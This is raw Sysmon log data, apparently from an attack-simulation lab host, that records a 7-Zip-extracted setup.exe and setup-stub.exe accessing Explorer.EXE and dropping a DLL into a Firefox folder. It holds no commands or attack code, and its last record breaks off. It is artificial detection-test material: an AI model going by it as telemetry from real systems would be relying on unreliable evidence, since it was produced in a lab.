13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.380{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 11241100x800000000000000014935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.380{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\libGLESv2.dll2021-01-18 13:59:52.380 10341000x800000000000000014934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C